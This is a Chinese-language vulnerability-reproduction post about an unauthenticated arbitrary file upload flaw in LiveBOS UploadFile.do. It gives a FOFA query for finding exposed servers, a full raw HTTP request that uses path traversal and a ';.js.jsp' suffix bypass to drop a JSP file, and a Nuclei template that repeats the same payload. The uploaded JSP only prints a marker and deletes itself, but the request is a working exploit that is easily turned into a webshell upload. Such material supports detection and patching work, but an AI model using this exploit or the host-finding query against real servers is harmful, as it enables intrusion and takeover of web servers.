【漏洞复现】LiveBOS UploadFile.do 任意文件上传

2024-08-11 08:40:37 浏览数 (3)

0x00 漏洞描述

LiveBOS 是顶点软件股份有限公司开发的一个对象型业务架构中间件及其集成开发工具。 LiveBOS UploadFile.do 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

影响范围

福建顶点软件股份有限公司-LiveBos <= 3.9.0

0x01 测绘工具

fofa: body=“Power by LiveBOS”

0x02 漏洞复现

代码语言:javascript复制
POST /feed/UploadFile.do;.js.jsp HTTP/1.1 
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
Connection: close
 
---WebKitFormBoundaryxegqoxxi
Content-Disposition:form-data; name="file"; filename="/../../../../test.jsp"
Content-Type: image/jpeg
 
<%@ page import="java.io.File" %>
<%
 out.println("test");
 String filePath = application.getRealPath(request.getServletPath());
 new File(filePath).delete();
%>
---WebKitFormBoundaryxegqoxxi--

0x03 Nuclei检测脚本

代码语言:javascript复制
id: LiveBOS UploadFile.do 任意文件上传

info:
  name: LiveBOS UploadFile.do 任意文件上传
  author: admin
  severity: critical
  description: |
    This template detects a file upload vulnerability that allows for 
    the upload of arbitrary files, including JSP files that can be executed on the server.
  reference:
    - https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

requests:
  - raw:
      - |
        POST /feed/UploadFile.do;.js.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
        Connection: close

        ----WebKitFormBoundaryxegqoxxi
        Content-Disposition: form-data; name="file"; filename="/../../../../test.jsp"
        Content-Type: image/jpeg

        <%@ page import="java.io.File" %>
        <%
         out.println("");
         String filePath = application.getRealPath(request.getServletPath());
         new File(filePath).delete();
        %>
        ----WebKitFormBoundaryxegqoxxi--

    matchers:
      - type: word
        words:
          - "file uploaded successfully"
        part: body

0x04 修复建议

厂商已发布安全修复版本,请及时联系官方售后或客服升级至最新版本,https://www.livebos.com

0x05 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。 请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。 作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

0 人点赞